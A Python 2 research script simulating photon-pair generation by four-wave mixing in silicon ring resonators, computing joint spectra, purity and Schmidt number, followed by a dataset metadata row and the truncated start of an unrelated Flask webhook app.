# for i in arange(Ni):
# m_filter_signal[i,:] = self.filter_signal(a_lbda_s)
# for j in arange(Ns):
# m_filter_idler[:,j] = self.filter_idler(a_lbda_i)
# lattice = lattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
lattice = lattice*(c*self.Epulse*self.gamma*(self.L))**2/(2*pi**2) #/ (2*pi*ng)
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
self.lattice = lattice
self.phases = phases
def plotBiphoton(self,fname = None):
plotcolormap(self.lattice,self.extent,fname)
def __g__(self,i,j):
#return (self.normlattice[i,:]*conjugate(self.normlattice[j,:])).sum()
return (self.normlattice[i,:]*exp(I*self.phases[i,:])*conjugate(self.normlattice[j,:]*exp(I*self.phases[j,:]))).sum()
def __g_nophase__(self,i,j):
return (self.normlattice[i,:]*conjugate(self.normlattice[j,:])).sum()
def __G_nophase__(self,i,j,k,l):
return self.__g_nophase__(i,j)*self.__g_nophase__(k,l)
vectg = vectorize(__g__)
def __G__(self,i,j,k,l):
return self.__g__(i,j)*self.__g__(k,l)
vectG = vectorize(__G__)
vectG_nophase = vectorize(__G_nophase__)
# Purity = Tr(ro**2)
def computenaivepurity(self):
lattice = sqrt(self.normlattice)
N = self.N
P = 0
for n in xrange(self.N):
for m in xrange(self.N):
P+= (lattice[:,n]*conjugate(lattice[:,m])).sum()*(lattice[:,m]*conjugate(lattice[:,n])).sum()
self.purity = abs(P)
self.schn = 1./P
return P
# Computes the probability of getting coincidences between two heralded photons from different sources
def computePcoincfrom2photons(self):
lattice = sqrt(self.normlattice)
#print "State Norm:", abs(lattice*conjugate(lattice)).sum() # equivalent to the trace
print "Computing proba coincidence"
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
Gnnmm = self.vectG(self,omega1,omega1,omega2,omega2)
Gnmmn = self.vectG(self,omega1,omega2,omega2,omega1)
print "Gnnmm: ",Gnnmm.sum()
print "Gnmmn: ",Gnmmn.sum()
Pcoinc = 0.5*(Gnnmm.sum()-Gnmmn.sum()) # See proof in my labbook from 2012 (27/01/2012)
print "Pcoinc: ",Pcoinc
print "Visibility: ", 1.-Pcoinc/0.5
self.visibility= 1.-Pcoinc/0.5
return 1.-Pcoinc/0.5
def computeHeraldedPhotonPurity(self):
#self.computePcoincfrom2photons()
lattice = self.normlattice
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
#print "State Norm:", abs(lattice*conjugate(lattice)).sum() # equivalent to the trace
purity = self.vectG(self,omega1,omega2,omega2,omega1).sum()
#purity2 = self.vectG_nophase(self,omega1,omega2,omega2,omega1).sum()
# print "Purity: ", purity,purity2
self.purity = abs(purity)
self.schn = 1/purity
"""
print "Computing heralded photon purity"
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
x = self.vectg(self,arange(N),arange(N))
print "Tr_ro1: ",x.sum()
g12 = self.vectg(self,omega1,omega2)
purity = (g12*g12).sum() # no dot product here, the formula (g12*g12).sum() provides exactly the trace over
# the reduced density matrix squared.
#print schn, schmidtnumber(lattice)
"""
return abs(purity)
###
# -----------------------------------------------------------------------------#
# CLASS FWM_RingSimu
# -----------------------------------------------------------------------------#
# This class calculates the joint spectral distribution obtained in a ring
# resonator for a given set of parameters
# Init (
# * Waveguide cross section
# * Waveguide length (Meters)
# * Pump power (Watts)
# * Pump wavelength (um)
# * Pulse duration (Seconds)
# * Repetition rate (Hz)
# * N: grid sampling (the JSA is stored in a NxN grid)
# * r: ring coupling (r = 1 means no coupling, while r = 0 means full coupling)
# * tau: round trip transmission which accounts for the loss in the ring resonator
# )
#
# setPumpToClosestRes(lambda) : Sets the pump to the closest resonance to the given wavelength
# setRangeScanResonance(p) : Sets the resonance to be used for collecting the idler photon. p is the resonance number.
# p = 0 is the same as the pump resonance
# p = +1 or -1 are the next nearest resonance to the pump
# p = +M or -M ....
#
# plotcavityresponse() : Shows the transmission spectrum of the cavity
# computeJS() : Does the simulation
#
# applycavity(lambda) : This is the function which applies the cavity. By default, this function applies a ring resonator.
# Different cavities can however be used.
# save(filename) : Saves the result of the simulation including all the parameters, the full state, and the derived parameters such as the Schmidt number
#
class FWM_RingSimu(FWM_Simu):
def __init__(self,wg = Waveguide(550,220),
length = 80., # um
pumppower = 45.*10**-3,pumpwl = 1.55,pulseduration=1.*10**(-12),N = 200,r = 0.98,tau = 1.0): # 300*10**3 -> 300 kHz linewidth
FWM_Simu.__init__(self,wg = wg,
length = length, # 0.03 ->3cm
pumppower = pumppower,pumpwl = pumpwl,pulseduration=pulseduration)
self.lbda_p = pumpwl # in um # We take the cavity resonance wavelength equal to the pump central wavelength
self.mpump = -1 # resonance number closest to the pump
# Ring parameters
self.L = length # Length of the ring in um
self.r = r
self.tau = tau # tau = 1. -> No loss
#self.tau = self.r # critical coupling
self.N = N
self.lattice = zeros((N,N))
# For loading purpose : Params
self.purity = -1
self.schn = -1
self.geneeff = -1
self.setters = {"Purity" : self.__setPurity__,
"Schmidt number" : self.__setSchn__,
"r" : self.__setr__,
"Nb pairs per pulse" : self.__setgeneeff__,
"Pulse duration (ps)" : self.__setT__ ,
"N" : self.__setN__,
}
self.resonancenumber = 0 # Resonance scanned for signal
# Setters when loading
def __setPurity__(self,x):
self.purity = x
def __setSchn__(self,x):
self.schn = x
def __setr__(self,x):
self.r = x
def __setgeneeff__(self,x):
self.geneeff = x
def __setT__(self,x):
self.T = x
def __setN__(self,x):
self.N = x
self.lattice = zeros((x,x))
self.phases = zeros((x,x))
def setTau(self,x):
self.tau = x
def setr(self,x):
self.r = x
def setL(self,L):
self.L = L
def ring(self,lbda):
k = self.wg.wl2kv(lbda)
t = sqrt(1-self.r**2)
tau = self.tau
r = self.r
return I*t/(1-tau*r*exp(I*k*self.L))
def cavity_transmission(self,lbda):
t = sqrt(1-self.r**2)
return self.r+I*t*self.ring(lbda)
# Override these methods to add custom filters on signal and idler arm
def filter_idler(self,lbda):
return ones(lbda.size)
def filter_signal(self,lbda):
return ones(lbda.size)
# If using two coupled rings
def set_r2(self,r2 = 0.999):
self.r2 = r2
def CROW2(self,lbda):
k = self.wg.wl2kv(lbda)
r2 = self.r2
t2 = sqrt(1-r2**2)
r1 = self.r
t1 = sqrt(1-r1**2)
tau = self.tau
L1 = self.L
L2 = L1
g1 = tau*exp(I*L1*k)
g2 = tau*exp(I*L2*k)
return I*t1*(r2-g2)/(1-r2*g2+r1*g1*(g2-r2))
def applycavity(self,lbda):
return self.ring(lbda)
# Returns the closest cavity resonance for a given lambda and the resonance number
def getClosestCavityRes(self,lbda):
m = round(self.wg.wl2kv(lbda)*self.L/(2*pi))
kp0 = m*2*pi/self.L # target pump propagation constant
# The problem is now to get lbda0 from kp0
# We start approximating the neff of lbda0 using the one of lambda
neff = self.wg.getneff(lbda)
# Using a scipy optimize method could be more robust and faster than the following code
lbda0 = 2*pi*neff/kp0
print lbda0
lbdastep = 1*10**(-7) * sign(lbda0-lbda)
kp = self.wg.wl2kv(lbda0)
err = (kp-kp0)/kp0
while(abs(err)>0.0000001):
lbda0 += lbdastep
kp = self.wg.wl2kv(lbda0)
newerr = (kp-kp0)/kp0
if newerr**2>err**2:
lbdastep = lbdastep*(-1)
err = newerr
return lbda0,m
# Centers the pump on the closest cavity resonance
def setPumpToClosestRes(self,lbda):
self.lbda_p,self.mpump = self.getClosestCavityRes(lbda)
print "Pump is set at %.7f um" % self.lbda_p
# Get the range to scan for signal for the nth resonance with respect to the pump
# Rq : The pump should have been set such that mpump has a meaningful value
def getSignalRange(self,n):
FWHM = (1-self.r*self.tau)*self.lbda_p**2/(self.wg.getng(self.lbda_p)*sqrt(2)*pi*self.L)
print "FWHM (um) : ",FWHM
fullrange = 5*FWHM #
wlFSR = self.lbda_p**2/(self.L*self.wg.getng(self.lbda_p)) # FSR in lambda
print "FSR (um) : ",wlFSR
lbda_s,m = self.getClosestCavityRes(self.lbda_p+n*wlFSR)
print "Resonance (um) : ",lbda_s
return lbda_s-fullrange/2,lbda_s+fullrange/2
def plotcavityresponse(self,albda = arange(1.5477-0.01,1.5477+0.01,0.0000001)):
cavity = self.applycavity(albda)*self.applycavity(albda).conjugate()
pump = self.pumpenvelop(albda)**2
lbda_i,m_i = self.getClosestCavityRes(1.548)
lbda_s = 1./(2./self.lbda_p-1./lbda_i)
signal_wl = funcpeak(albda,lbda_s)
idler_wl = funcpeak(albda,lbda_i)
plot([(albda,cavity,"-"),
(albda,pump/pump.max()*cavity.max(),"-"),
(albda,signal_wl/signal_wl.max()*cavity.max(),"r-"),
(albda,idler_wl/idler_wl.max()*cavity.max(),"r-")
]) # Plot the pump normalised wrt the biggest field enhancement
def setRangeJS(self,lbda_s_min,lbda_s_max,lbda_i_min,lbda_i_max):
self.lbda_s_min = lbda_s_min
self.lbda_s_max = lbda_s_max
self.lbda_i_min = lbda_i_min
self.lbda_i_max = lbda_i_max
def setRangeScanResonance(self,m):
# Get the range for signal centered on the resonance
lsm,lsM = self.getSignalRange(m)
self.resonancenumber = m
# Get the range for idler using rough energy conservation
lp = self.lbda_p
lim = 1./(2./lp - 1./lsM)
liM = 1./(2./lp - 1./lsm)
#print "%.2f %.2f ; %.2f %.2f (pm)" % (lsm*10**6,lsM*10**6,lim*10**6,liM*10**6)
print lsm,lsM,lim,liM
self.setRangeJS(lsm,lsM,lim,liM)
def updatepumprange(self):
print "Get pump range ..."
lbda_p = self.lbda_p
print lbda_p
lbda_step= 0.00000001 # step for finding the pump range
P = 0.
targetfraction = 0.95
deltalbda = 0.5*10**(-6) # initialize deltalbda at 1pm
while (P<targetfraction):
deltalbda = 2*deltalbda
lbdas = arange(lbda_p-deltalbda,lbda_p+deltalbda,lbda_step)
#print P
P=(self.pumpenvelop(lbdas)*self.pumpenvelop(lbdas).conjugate()).sum()*lbda_step
print P
print P
N = 400
# get cavity range
# If the pump is broader than the cavity, then we should chop the pump to the cavity region such that the grid is fine enough in the cavity
# If the pump is narrower than the cavity, then keep pump range
lsm,lsM = self.getSignalRange(0)
rl = lsM-lsm
lsm = lsm-rl/2
lsM = lsM+rl/2
lbdamax = min(lbdas[-1],lsM)
lbdamin = max(lbdas[0],lsm)
step = (lbdamax-lbdamin)/N # Step for the returned pump range
res = arange(lbdamin,lbdamax,step)
#print "Size of pump lbdas" ,lbdas.size
#print self.pumpenvelop(lbda_p)
self.pumprange = res
print "Pump range : (um)",lbdas[0],lbdas[-1]
return res
def getjointproba(self):
return self.normlattice
def getjointprobascaled(self):
return self.normlattice/self.normlattice.max()
def computeJS(self): # begin=1.545,end=1.555,step=0.0001
print self.wg.getng(self.lbda_p)
P = self.pumppower
L = self.L # Cavity length
N = self.N
lbda_s_min = self.lbda_s_min
lbda_s_max = self.lbda_s_max
lbda_i_min = self.lbda_i_min
lbda_i_max = self.lbda_i_max
step_i = (lbda_i_max-lbda_i_min)/N
step_s = (lbda_s_max-lbda_s_min)/N
a_lbda_i = arange(lbda_i_min,lbda_i_max,step_i)[0:N]
a_lbda_s = arange(lbda_s_min,lbda_s_max,step_s)[0:N]
Ni = a_lbda_i.size
Ns = a_lbda_s.size
print Ni, Ns
Ni = N
Ns = N
self.step_i = step_i
self.step_s = step_s
rangepump = self.pumprange
M = rangepump.size
dlbda_pump = (rangepump.max()-rangepump.min())/M
lattice = zeros((Ni,Ns))
a_lbda_p1 = rangepump
cav_resp_p1 = self.applycavity(a_lbda_p1)
a_p1 = self.pumpenvelop(a_lbda_p1) # pump amplitude 1
ng = self.wg.getng(self.lbda_p)
print "Steps" ,step_i,step_s
#dbgpm = 0.
pumpmax = self.pumpenvelop(self.lbda_p)
phases = zeros((Ni,Ns))
for j in xrange(Ns):
print j
lbda_s = a_lbda_s[j] # lbda_s_min+j*step_s
cav_resp_s = self.applycavity(lbda_s)
for i in xrange(Ni):
lbda_i = a_lbda_i[i] # lbda_i_min+i*step_i
a_lbda_p2 = 1./(1./lbda_s+1./lbda_i-1./a_lbda_p1)
a_p2 = self.pumpenvelop(a_lbda_p2) # pump amplitude 2
# In order to save computation time we can take a_pm = 1. for small cavities
a_dk = self.getdk(P*a_p1*conjugate(a_p1),P*a_p2*conjugate(a_p2),a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
a_pm = sinc(L/2*a_dk/pi) # the L will be added later in the global constant
#a_pm = 1.
a_res = a_p1*a_p2*a_pm*cav_resp_p1*self.applycavity(a_lbda_p2)* self.applycavity(lbda_i)*cav_resp_s #
a_res = a_res * a_lbda_p2/a_lbda_p1
# Multiply by the dlambda;
# The pump function is i um^(-1/2), dlbda_pump is in um
a_res = a_res*dlbda_pump
res = a_res.sum() # unitless
#res = res
# Multiply by the dlambda
# Since the formula was derived for domega, we have to remember that domega = -2*pi*c/lbda**2 * dlbda
lattice[i,Ns-1-j]= abs(res.real**2+res.imag**2)* (step_i/(lbda_i**2)) * (step_s/(lbda_s**2))
#print angle(res)
phases[i,Ns-1-j] = angle(res)
# Check what should be the proper formula which keeps the joint spectral amplitude instead of joint spectral probability distribution
# Apply custom filters:
# m_filter_signal =zeros((Ni,Ns))
# m_filter_idler =zeros((Ni,Ns))
# for i in arange(Ni):
# m_filter_signal[i,:] = self.filter_signal(a_lbda_s)
# for j in arange(Ns):
# m_filter_idler[:,j] = self.filter_idler(a_lbda_i)
# lattice = lattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
lattice = lattice*(c*self.Epulse*self.gamma*(self.L))**2/(2*pi**2) #/ (2*pi*ng)
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
self.lattice = lattice
self.phases = phases
xi = 2*lattice.sum()
xi = tanh(sqrt(xi))**2 # Approximation valid in the case of two-mode squeezer
self.probapair = xi * (1-xi)
# Theory calculation for CW regime for comparison
vg = c/self.wg.getng(self.lbda_p)
print "Epulse (nJ) ", self.Epulse*10**9
print "gamma W-1,m-1", self.gamma
print "L (um)", L
print "T (ps)", self.T*10**12
print "vg %e" % vg
print "r : %.4f" % self.r
print "tau : %.4f" % self.tau
print "Siglbda : %.5f" % (self.siglbda)
#deltalbda = self.siglbda*sqrt(2*pi) # Such that the approx rectangular pulse results matches the gaussian def
#beta2_pulsed = (self.Epulse*self.gamma*c)**2/(32*ng**4*pi**6)*self.lbda_p**4/(L**2*deltalbda**2)*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = (self.Epulse*self.gamma*c)**2/(32*ng**4*pi**2)*self.lbda_p**4*pumpmax**4/(L**2)*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = tanh(sqrt(xi))**2
beta2_pulsed = xi * (1-xi)
#beta2_pulsed = (self.Epulse*self.T*self.gamma/(L*10**(-6)))**2*vg**4/16.*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = self.gamma**2*self.pumppower**2*(L*10**(-6))/8 * vg*self.T*(1-self.r**2)**4/(1-self.r*self.tau)**7
xi = tanh(sqrt(xi))**2
beta2_CW = xi * (1-xi)
# We multiply the lattice by a factor of two since we only integrate over half of Phi(k1,k2) and we should account for the other symmetrical half
print "Nb pairs per pulse:",self.probapair
print "Flat pulse model:", beta2_pulsed
print "CW model:", beta2_CW
lbda_i0 = (lbda_i_max+lbda_i_min)/2
lbda_s0 = (lbda_s_max+lbda_s_min)/2
self.extent = list(array([lbda_i_min-lbda_i0,lbda_i_max-lbda_i0,lbda_s_min-lbda_s0,lbda_s_max-lbda_s0])*1000) # Check where should go i and s
self.beta2_pulsed = beta2_pulsed
self.beta2_CW = beta2_CW
def getPhases(self):
return self.phases
def getAverageSpectra(self):
return self.normlattice.sum(axis = 0),self.normlattice.sum(axis = 1)
def save(self,directory="resonances_toshiba"):
timestamp = time.strftime("%m%d_%H%M",time.localtime(time.time()))
# Create repository if it does not exist
if not os.path.exists("data\\%s" % directory):
os.makedirs("data\\%s" % directory)
fname = "data\\%s\\simu_%s_r=%.3f_tau=%.3f_%.2fps_res=%d.txt" % (directory,timestamp,self.r,self.tau,self.T * 10**12,self.resonancenumber)
# Header
fw = open(fname,"w")
fw.write("#Laser parameters\n")
fw.write("%s : %.3f\n" % ("Pulse duration (ps)",self.T*10**12))
fw.write("%s : %.4f\n" % ("Pump power avg (mW)",self.pumppower*1000))
fw.write("%s : %.3f\n" % ("Repetition rate(MHz)",self.reprate/(10**6)))
fw.write("%s : %.18e\n" % ("Energy per pulse (uJ)",self.Epulse*1000000))
fw.write("%s : %.6f\n" % ("Pump wavelength (um)",self.lbda_p))
fw.write("\n#Waveguide parameters\n")
fw.write("%s : %.3f\n" % ("Width (nm)",self.wg.width))
fw.write("%s : %.3f\n" % ("Height (nm)",self.wg.height))
fw.write("%s : %.3f\n" % ("Aeff (um^2)",self.wg.Aeff))
fw.write("%s : %.3f\n" % ("gamma (W-1 m-1)",self.gamma))
fw.write("\n#Ring parameters\n")
fw.write("%s : %.3f\n" % ("Cavity length (um)",self.L))
fw.write("%s : %.5f\n" % ("Tau",self.tau))
fw.write("%s : %.5f\n" % ("r",self.r))
fw.write("\n#BiPhoton state properties\n")
fw.write("%s : %.5f\n" % ("Nb pairs per pulse",self.probapair))
fw.write("%s : %.5f\n" % ("Flat pulse model",self.beta2_pulsed))
fw.write("%s : %.5f\n" % ("CW model",self.beta2_CW))
self.computeHeraldedPhotonPurity()
#self.computePcoincfrom2photons()
#fw.write("%s : %.6f\n" % ("Visibility from two heralded sources",self.visibility))
fw.write("%s : %.6f\n" % ("Schmidt number",abs(self.schn)))
fw.write("%s : %.6f\n" % ("Purity",abs(1/self.schn)))
# Theory calculation for CW regime for comparison
vg = c/self.wg.getng(self.lbda_p)
beta2 = self.gamma**2*(self.Epulse/self.T)**2*(self.L*10**(-6))/8 * vg*self.T*(1-self.r**2)**4/(1-self.r)**7
fw.write("%s : %.5f\n" % ("Nb pairs(analytical CW)",beta2))
fw.write("\n")
fw.write("N=%d\n" % self.N)
fw.write("Resonance number : %d\n" % self.resonancenumber)
fw.write("\n#Scan range\n")
fw.write("%s : %.6e - %.6e, %.6e\n" % ("idl min, idl max, step (um)",self.lbda_i_min,self.lbda_i_max,self.step_i))
fw.write("%s : %.6e - %.6e, %.6e\n" % ("sig min, sig max, step (um)",self.lbda_s_min,self.lbda_s_max,self.step_s))
fw.write("\n#Raw data Biphoton distribution\n")
# Saves the joint spectrum
for j in xrange(self.N):
line = " ".join(("%.18e" % x) for x in self.lattice[:,self.N-1-j])
fw.write(line+"\n")
fw.write("\n#Raw data Biphoton phase distribution\n")
# Saves the joint spectrum
for j in xrange(self.N):
line = " ".join(("%.18e" % x) for x in self.phases[:,self.N-1-j])
fw.write(line+"\n")
fw.close()
return fname
def load(self,fname):
print "Loading %s ..." % fname
f = open(fname,"r")
line = f.readline()
while (len(line)>0):
if line.startswith("#Scan range"):
# Load the extent of the wavelength for signal and idler
line = f.readline() # Readline for the idler
self.lbda_i_min,self.lbda_i_max = parse_extent(line)
line = f.readline() # Readline for the signal
self.lbda_s_min,self.lbda_s_max = parse_extent(line)
self.extent = [self.lbda_i_min,self.lbda_i_max,self.lbda_s_min,self.lbda_s_max] # Check where should go i and s
if line.startswith("#Raw data Biphoton distribution"):
# Load the biphoton distribution
for j in xrange(self.N):
line = f.readline()
self.lattice[:,self.N-1-j] = parse_biphoton_data(line)
if line.startswith("#Raw data Biphoton phase distribution"):
# Load the biphoton phase distribution
for j in xrange(self.N):
line = f.readline()
self.phases[:,self.N-1-j] = parse_biphoton_data(line)
if line.find("#")>=0:
l1 = line.split("#")[0]
if line.find(":")>=0:
line = line.replace("\n","")
name,value = line.split(" : ")
if name in self.setters.keys():
self.setters[name](float(value))
elif line.startswith("N="):
name,value = line.split("=")
self.setters[name](int(value))
line = f.readline()
Z = self.lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(self.lattice/Z))
f.close()
class CustomPump():
def __init__(self,fname="G2 Straight Transmission.csv"):
self.rootname = "."
self.__load__(fname)
self.__fit__()
def __load__(self,fname):
path = os.path.join(self.rootname,fname)
f = open(path)
line = f.readline()
lbdas = []
amplitudes = []
for i in arange(30):
line = f.readline()
while(len(line))>0:
splitted = line.split(",")
lbda,amplitude = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda)/1000) # nm -> um
amplitudes.append(float(amplitude))
self.lbdas = array(lbdas)
self.amplitudes = array(amplitudes)
self.amplitudes = self.amplitudes/self.amplitudes.sum() # Normalise
self.lbda_p = self.lbdas[self.amplitudes.argmax()]
def __fit__(self):
# Gaussian multiplied by rational fraction to account for distorsion
a = (10**3)
b = (10**3)
c = (10**3)**1.5
d = 10
e = 1
f = 1
sig = 1.0*10**(-3) # um
p0 = [self.lbda_p,sig,a,b,c,d,e,f]
plsq = leastsq(self.__residuals__, p0, args=(self.amplitudes, self.lbdas))
self.p = plsq[0]
print self.p
# p : parameters
# lbdas : wavelengths
def __func__(self,p,lbdas):
lbda0,sig,a,b,c,d,e,f = p
dlbdas = lbdas-lbda0
res = exp(-dlbdas**2/(2*sig**2))*(a*dlbdas+f/(b*dlbdas**3+c*dlbdas**2+d*dlbdas+e))
return res
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getPulse(self,lbda):
return self.__func__(self.p,lbda)
def plotres(self):
lbda1,lbda2 = min(self.lbdas),max(self.lbdas)
x = arange(lbda1,lbda2,0.000001)
#self.p = (A,r,tau)
plots = [(self.lbdas,self.amplitudes,"ro"),(x,self.getPulse(x),"k-")] # (neff0 self.lbdas,self.Iouts,"ro"),
#plot(plots)
print self.lbda_p
return plots
# Fit ring when seeded by a pulse laser from which we know the shape
class RingPulsed():
def __init__(self,R,Lc,fname,pumpfunc):
self.R = R # radius (um)
self.Lc = Lc # coupling length (um)
self.L = 2*(pi*R + Lc) # Total length
#FSR = 1.5556-1.5477 # um
self.neff0 = 4.14330 #4.143277 # Starting effective group index 4.1434
self.pumpfunc = pumpfunc
self.rootname = "."
self.__load__(fname)
self.__fit__()
def __load__(self,fname):
path = os.path.join(self.rootname,fname)
f = open(path)
line = f.readline()
lbdas = []
amplitudes = []
for i in arange(30):
line = f.readline()
while(len(line))>0:
splitted = line.split(",")
lbda,amplitude = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda)/1000) # nm -> um
amplitudes.append(float(amplitude))
self.lbdas = array(lbdas)
self.amplitudes = array(amplitudes)
self.amplitudes = self.amplitudes/self.amplitudes.sum() # Normalise
self.lbda_p = self.lbdas[self.amplitudes.argmin()]
# adjust the neff0 guess
m = int(self.neff0*self.L/self.lbda_p)
self.neff0 = m*self.lbda_p/self.L
def __fit__(self):
a = b = c = d=e=f=0.000000000000001
p0 = [max(self.amplitudes),0.9,0.9,self.neff0,a,b,c,d,e,f]
plsq = leastsq(self.__residuals__, p0, args=(self.amplitudes, self.lbdas))
self.p = plsq[0]
print self.p
# p : parameters
# lbdas : wavelengths
def __func__(self,p,lbdas):
A,r,tau,neff,a,b,c,d,e,f = p
dlbdas = lbdas-self.lbda_p
#neff = self.neff0
L = self.L
phi = 2*pi*L*neff/lbdas
r2 = r**2
tau2 = tau**2
K = 2*r*tau*cos(phi)
res = A*(r2+tau2-K)/(1+r2*tau2-K) * self.pumpfunc(lbdas) * (a+b*dlbdas+c*dlbdas**3)/(d+e*dlbdas+f*dlbdas**3)
return res
def ringResponse(self,p,lbdas):
A,r,tau,neff,a,b,c,d,e,f = p
dlbdas = lbdas-self.lbda_p
#neff = self.neff0
L = self.L
phi = 2*pi*L*neff/lbdas
r2 = r**2
tau2 = tau**2
K = 2*r*tau*cos(phi)
res = A*(r2+tau2-K)/(1+r2*tau2-K) * (a+b*dlbdas+c*dlbdas**3)/(d+e*dlbdas+f*dlbdas**3)*max(self.pumpfunc(lbdas))
return res
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getIout(self,lbda):
return self.__func__(self.p,lbda)
def plotres(self):
lbda1,lbda2 = min(self.lbdas),max(self.lbdas)
x = arange(lbda1,lbda2,0.000001)
plots = [(self.lbdas,self.amplitudes,"bo"),(x,self.getIout(x),"k-"),(x,self.ringResponse(self.p,x),"b--")] # (self.lbdas,self.Iouts,"ro"),
#plot(plots)
self.lbda_p = self.lbdas[self.amplitudes.argmin()]
print self.lbda_p
return plots
# December 15, 2004 / Vol. 29, No. 24 / OPTICS LETTERS p 2861
# Ultrahigh-quality-factor silicon-on-insulator microring resonator
def computeQ(self):
A,r,tau,neff=self.p[0:4]
return (2*pi*neff/self.lbda_p)*self.L/(-2*log(r*tau))
def main():
# Load the pulse
#pump = CustomPump("G2 Straight Transmission.csv")
#pump.plotres()
#pumpfunc = pump.getPulse
wg = Waveguide(450,220)
T = 100.*10**(-12)
#for T in [100.,50.,25.,10.,5.]:
N = 100 # 200# N = 50 Provides accurate number for r = 0.98 rings with 100ps pulses
#for T in [1000.,500.,200.,100.,50.,25.,10.]:
r = 0.93
tau = 1.-0.0198
radius = 10.
coupling_length = 5.
lbda0= 1.55
res_number = 1 # resonance number (pump resonance is 0).
for res_number in [1]: #arange(0,1):# [1,2,3,4]:
for T in [5.0] : # ,0.75,1.,1.5,2.0,0.5,1.,5.,,50.,100.,500.,1000.,2000. #arange(10.,1000,10.): # [60.,70.,80.,90.,110.,120.,130.,140.,150.,160.,170.,180.,190.,210.,220.,230.,240.,250.,260.,270.,280.,290.]: #arange(10.,100.,10.): # arange(5,55,5): #[25.,50.,100.,200.,500.]: [1.0,2.0,5.0,10.0,20.0,50.0,100.0,200.0,500.0,1000.0,]
for r in [0.9]: # [0.95,0.96,0.97,0.98,0.99]: # 0.85,0.86,0.87,0.88,0.89,0.90,0.91,0.92,0.93,0.94,0.95,0.96
for tau in [0.997]: # 0.76,0.96,0.98
#for r2 in [0.9998,0.9997,0.9996,0.9995,0.9994]: #[1.0,0.9999,0.999,0.99]:
mySim =FWM_RingSimu(wg,length = 2*(radius*pi+coupling_length),pulseduration = T*10**(-12),N = N,r = r,tau = tau,pumppower = 3.*10**-3,pumpwl = lbda0) # 500
#mySim.pumpenvelop = pumpfunc
mySim.setRangeScanResonance(+res_number)
mySim.plotcavityresponse()
mySim.updatepumprange()
mySim.computeJS()
fname = mySim.save("Ring_pumpscan")
mySim.plotBiphoton(fname[:-3]+"png")
# -----------------------------------------------------------------------------#
# MISC FUNCTIONS II: Specific FWM applications
# -----------------------------------------------------------------------------#
def plot1Dgain():
wgs = [
#Waveguide(450,220),
Waveguide(470,220)
#Waveguide(500,220),
#Waveguide(550,220),
]
plots = []
colors = ["r-","b-","g-"]
i = 0
lbda_s = arange(1.40,1.70,0.0001)
for wg in wgs:
simu = FWM_Simu(wg = wg,length = 0.0058,pumpwl = 1.5479)
res = simu.toplotCWGain(lbda_s)
plots.append((lbda_s,res,colors[i]))
i += 1
fw = open("fwm_bandwidth_cw.csv","w")
fw.write("Wavelength (um), FWM gain (a.u)")
for i in arange(lbda_s.size):
line = "%.5f,%.5f\n" % (lbda_s[i],res[i])
fw.write(line)
fw.close()
plot(plots)
def plotnbpairsScaling():
lbda_min = 1.542
lbda_max = 1.544
wg = Waveguide(550,220)
lbda_s = arange(1.5,1.6,0.0001)
tointegrate = (lbda_s>lbda_min) * (lbda_s<lbda_max)
lengths = arange(0,0.01,0.0001)
#lengths = arange(0,100.,0.1)
res = []
for L in lengths:
simu = FWM_Simu(wg = wg,length = L )
gainperbandwidth = (L/2)**2*simu.toplotCWGain(lbda_s = lbda_s) #
#res.append(gainperbandwidth[tointegrate].sum())
res.append(gainperbandwidth.sum())
plot([(lengths,res,"r-")])
if __name__ == "__main__":
#pump = CustomPump("G2 Straight Transmission.csv")
#pump.plotres()
#ring = RingPulsed(20,5,"G2 Ring Transmission.csv",pump.getPulse)
#plot(ring.plotres()+pump.plotres())
main()
#plotnbpairsScaling()
#plot1Dgain()
| [
"[email protected]"
] | |
1781619b0a8abd1d3cb474a67ee1c1d84f0bd6c4 | 080688b23a9114a41594a4483b07a8896f106102 | /app.py | 3373c706cfc92661c50d138bb12a87ac3122f194 | [
"Apache-2.0"
] | permissive | ashishqm/sept | 3160e9498190a8b60d93fc604394ab4d9c9e67ee | 0772c20417bb3d1331f3960016e4e6d861acf8ec | refs/heads/master | 2020-03-27T21:23:48.242448 | 2018-09-03T02:16:25 | 2018-09-03T02:16:25 | 147,140,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,418 | py | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/static_reply', methods=['POST'])
def static_reply():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "interest":
return {}
result = req.get("result")
parameters = result.get("parameters")
name = parameters.get("bank-name")
